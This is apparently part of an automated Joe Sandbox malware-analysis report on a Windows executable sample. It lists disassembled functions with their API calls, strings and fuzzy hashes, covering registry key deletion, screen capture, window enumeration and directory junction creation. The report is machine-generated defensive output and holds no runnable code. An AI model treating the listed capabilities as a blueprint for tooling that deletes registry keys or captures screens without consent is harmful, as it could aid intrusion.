                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: ae03f00d7650e9f65eee414fb1b0bb99a5dcba32023a214e472a2e240beea427
                                                      • Instruction ID: d8b645de5724727815aef7333466f3dbc7f0dc96267551ca2df2aa7d420aa384
                                                      • Opcode Fuzzy Hash: ae03f00d7650e9f65eee414fb1b0bb99a5dcba32023a214e472a2e240beea427
                                                      • Instruction Fuzzy Hash: 1A411D75600204AFDB11DF66DE48EAE7BB8FF89715F144068F909E7260DB729D06CB60
                                                      Function 00EA14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00EA1502
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00EA150B
                                                      • VariantClear.OLEAUT32(?), ref: 00EA1517
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EA15FB
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00EA1657
                                                      • VariantInit.OLEAUT32(?), ref: 00EA1708
                                                      • SysFreeString.OLEAUT32(?), ref: 00EA178C
                                                      • VariantClear.OLEAUT32(?), ref: 00EA17D8
                                                      • VariantClear.OLEAUT32(?), ref: 00EA17E7
                                                      • VariantInit.OLEAUT32(00000000), ref: 00EA1823
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 1234038744-3931177956
                                                      • Opcode ID: c301dd1c6971acc83c111603e40492d3b214ebe73fa6d2c04db25bd344adef16
                                                      • Instruction ID: eaba044dacad2482a0c0a803f979125acc1ba1c9a331ab2c366639f8bca4d78a
                                                      • Opcode Fuzzy Hash: c301dd1c6971acc83c111603e40492d3b214ebe73fa6d2c04db25bd344adef16
                                                      • Instruction Fuzzy Hash: C9D1EF31A00605DBDB049FA5E895BB9B7F5BF4A700F24A0AAF446BF180DB30EC45DB61
                                                      Function 00EBB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00EBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBB6AE,?,?), ref: 00EBC9B5
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBC9F1
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA68
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBB6F4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBB772
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00EBB80A
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBB87E
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBB89C
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EBB8F2
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBB904
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBB922
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EBB983
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBB994
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      • Opcode ID: 57a74036ffe01bfd083fda3f3dd5664b7e2ed5d9f8807bde7160bd40b6e4281f
                                                      • Instruction ID: d09a5283000303f3b363c1de921949f908ac62aa1587e980440e1a42db0caaf0
                                                      • Opcode Fuzzy Hash: 57a74036ffe01bfd083fda3f3dd5664b7e2ed5d9f8807bde7160bd40b6e4281f
                                                      • Instruction Fuzzy Hash: 56C1A134208201AFD714DF14C495F6ABBE5FF84318F18A55CF59A6B2A2CBB1EC46CB91
                                                      Function 00EB255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00EB25D8
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EB25E8
                                                      • CreateCompatibleDC.GDI32(?), ref: 00EB25F4
                                                      • SelectObject.GDI32(00000000,?), ref: 00EB2601
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EB266D
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EB26AC
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EB26D0
                                                      • SelectObject.GDI32(?,?), ref: 00EB26D8
                                                      • DeleteObject.GDI32(?), ref: 00EB26E1
                                                      • DeleteDC.GDI32(?), ref: 00EB26E8
                                                      • ReleaseDC.USER32(00000000,?), ref: 00EB26F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 148990bf616b77f9aef3aa2975d6ee69503dfe5215c8e30616df553d61cb7cd5
                                                      • Instruction ID: 06ea45b831bf64c6390d281d18e0ce335821523b2e71cf4134a4f36c102771a0
                                                      • Opcode Fuzzy Hash: 148990bf616b77f9aef3aa2975d6ee69503dfe5215c8e30616df553d61cb7cd5
                                                      • Instruction Fuzzy Hash: 7061D075D00219EFCB04CFA9D984EAEBBF5FF48310F248529EA59B7250D771A9418F90
                                                      Function 00E6DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00E6DAA1
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D659
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D66B
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D67D
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D68F
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6A1
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6B3
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6C5
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6D7
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6E9
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D6FB
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D70D
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D71F
                                                        • Part of subcall function 00E6D63C: _free.LIBCMT ref: 00E6D731
                                                      • _free.LIBCMT ref: 00E6DA96
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6DAB8
                                                      • _free.LIBCMT ref: 00E6DACD
                                                      • _free.LIBCMT ref: 00E6DAD8
                                                      • _free.LIBCMT ref: 00E6DAFA
                                                      • _free.LIBCMT ref: 00E6DB0D
                                                      • _free.LIBCMT ref: 00E6DB1B
                                                      • _free.LIBCMT ref: 00E6DB26
                                                      • _free.LIBCMT ref: 00E6DB5E
                                                      • _free.LIBCMT ref: 00E6DB65
                                                      • _free.LIBCMT ref: 00E6DB82
                                                      • _free.LIBCMT ref: 00E6DB9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 8bf63b56cd5670e9be68ef076ece6c1d37506ab2001b2b5960f9e2b8a69b67cc
                                                      • Instruction ID: fdbae7f44e6001d0ebaaab3685497ee6e5ccdcfdf36f7eaf4d17e787bc934f9e
                                                      • Opcode Fuzzy Hash: 8bf63b56cd5670e9be68ef076ece6c1d37506ab2001b2b5960f9e2b8a69b67cc
                                                      • Instruction Fuzzy Hash: 9C317A31B88A049FEB25AA78FC41B6A77E9FF803E4F95641DE148F7191DA30AC408720
                                                      Function 00E9365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E9369C
                                                      • _wcslen.LIBCMT ref: 00E936A7
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E93797
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E9380C
                                                      • GetDlgCtrlID.USER32(?), ref: 00E9385D
                                                      • GetWindowRect.USER32(?,?), ref: 00E93882
                                                      • GetParent.USER32(?), ref: 00E938A0
                                                      • ScreenToClient.USER32(00000000), ref: 00E938A7
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E93921
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E9395D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 4010501982-679674701
                                                      • Opcode ID: b72d8760dc8f0c3a1b3eff5603a9a16bb95d65ebc25a8b86ef9ea57e765bd21c
                                                      • Instruction ID: 22e2241c34628278ebc522d0a6b9a464ac53ad7e35d81ab38e6da9f51dbbb49c
                                                      • Opcode Fuzzy Hash: b72d8760dc8f0c3a1b3eff5603a9a16bb95d65ebc25a8b86ef9ea57e765bd21c
                                                      • Instruction Fuzzy Hash: 7391C171204706AFDB18DF74C885FAAB7E8FF44354F109529F999E2190DB30EA4ACB91
                                                      Function 00E94954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E94994
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E949DA
                                                      • _wcslen.LIBCMT ref: 00E949EB
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E949F7
                                                      • _wcsstr.LIBVCRUNTIME ref: 00E94A2C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E94A64
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E94A9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E94AE6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E94B20
                                                      • GetWindowRect.USER32(?,?), ref: 00E94B8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
                                                      • Opcode ID: 8bd619c7b3221e17cb76f3df1a65a98a618e8368f425245cc243fc6d72b01c9b
                                                      • Instruction ID: 99d7d088cb8bc5f09e804017685f5fa7361b79978bc0384d5712888712812a62
                                                      • Opcode Fuzzy Hash: 8bd619c7b3221e17cb76f3df1a65a98a618e8368f425245cc243fc6d72b01c9b
                                                      • Instruction Fuzzy Hash: 3D91A0B11042059FDF04DF14C985FAA77E8FF84718F046469FD85AA196EB30ED46CBA1
                                                      Function 00EC8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC8D5A
                                                      • GetFocus.USER32 ref: 00EC8D6A
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00EC8D75
                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00EC8E1D
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EC8ECF
                                                      • GetMenuItemCount.USER32(?), ref: 00EC8EEC
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00EC8EFC
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EC8F2E
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EC8F70
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EC8FA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                      • String ID: 0
                                                      • API String ID: 1026556194-4108050209
                                                      • Opcode ID: 4f5f5f452e6f8fc1edf3d4b82a1fe811ef5ae9033ceb318c2e4071461e00bdff
                                                      • Instruction ID: bcf287653a2b683d4b202f3dbdba01c4032b60ced41473c5810bf78ff14dee4f
                                                      • Opcode Fuzzy Hash: 4f5f5f452e6f8fc1edf3d4b82a1fe811ef5ae9033ceb318c2e4071461e00bdff
                                                      • Instruction Fuzzy Hash: E181BC716083459FD710CF14CB84EAB7BE9FB88318F14192DF985A7291DB32D906CB62
                                                      Function 00E9DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E9DC20
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E9DC46
                                                      • _wcslen.LIBCMT ref: 00E9DC50
                                                      • _wcsstr.LIBVCRUNTIME ref: 00E9DCA0
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E9DCBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 1939486746-1459072770
                                                      • Opcode ID: 0f1e9cd68afb4a4f96d830fe3ba36ee67383be19eea343e586130e01b80ffa3d
                                                      • Instruction ID: 845fecf741f11204a2ebd34baa7d3ffdc6bfde6f6ea5bee072a64f35aec934d7
                                                      • Opcode Fuzzy Hash: 0f1e9cd68afb4a4f96d830fe3ba36ee67383be19eea343e586130e01b80ffa3d
                                                      • Instruction Fuzzy Hash: DD4143329043147ADB14AB749C07EFF77ACEF41B61F102869F904B6182EB75A90587A1
                                                      Function 00EBCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBCC64
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EBCC8D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBCD48
                                                        • Part of subcall function 00EBCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EBCCAA
                                                        • Part of subcall function 00EBCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EBCCBD
                                                        • Part of subcall function 00EBCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBCCCF
                                                        • Part of subcall function 00EBCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBCD05
                                                        • Part of subcall function 00EBCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBCD28
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBCCF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2734957052-4033151799
                                                      • Opcode ID: e751e2e97f23ad33f4997820329479ee1e379fafe609c3146fbd925888be7042
                                                      • Instruction ID: 287ce62aba34e70552b4718ebe9a4b92ed923cb6f5e5d2d9fcb9ed75df928808
                                                      • Opcode Fuzzy Hash: e751e2e97f23ad33f4997820329479ee1e379fafe609c3146fbd925888be7042
                                                      • Instruction Fuzzy Hash: 8D318E75901129BFDB208B52DC88EFFBB7CEF55754F200165F909F2250DA309A4ADAA0
                                                      Function 00EA3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EA3D40
                                                      • _wcslen.LIBCMT ref: 00EA3D6D
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EA3D9D
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EA3DBE
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00EA3DCE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EA3E55
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA3E60
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA3E6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 1149970189-3457252023
                                                      • Opcode ID: bed79e107e72e3b0a8361ae29ec2ec65b321c0fb88d4ad5695fff889ac66a7f7
                                                      • Instruction ID: 8981bba96303bd42cd934fb3cc2349fcf67b0ec34b17d73999c11c91a6cc70e5
                                                      • Opcode Fuzzy Hash: bed79e107e72e3b0a8361ae29ec2ec65b321c0fb88d4ad5695fff889ac66a7f7
                                                      • Instruction Fuzzy Hash: 7D31D472900209ABDB209BA1DC49FEF37BCEF89745F2050B5F909F6060E77497498B24
                                                      Function 00E9E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00E9E6B4
                                                        • Part of subcall function 00E4E551: timeGetTime.WINMM(?,?,00E9E6D4), ref: 00E4E555
                                                      • Sleep.KERNEL32(0000000A), ref: 00E9E6E1
                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00E9E705
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E9E727
                                                      • SetActiveWindow.USER32 ref: 00E9E746
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E9E754
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E9E773
                                                      • Sleep.KERNEL32(000000FA), ref: 00E9E77E
                                                      • IsWindow.USER32 ref: 00E9E78A
                                                      • EndDialog.USER32(00000000), ref: 00E9E79B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 6481c794484eedf60e6b49a835e1f4657cc67ea3d731f667f93ddc49d92eb5e1
                                                      • Instruction ID: 21a4f093915a2657a4c158028945ae40c475f9bb2bb4c008aac5d6668581f0cf
                                                      • Opcode Fuzzy Hash: 6481c794484eedf60e6b49a835e1f4657cc67ea3d731f667f93ddc49d92eb5e1
                                                      • Instruction Fuzzy Hash: B72151B0200209BFEF009F61ED8DE253B69F75474DB242435FA19B16A1DB73AC45AB25
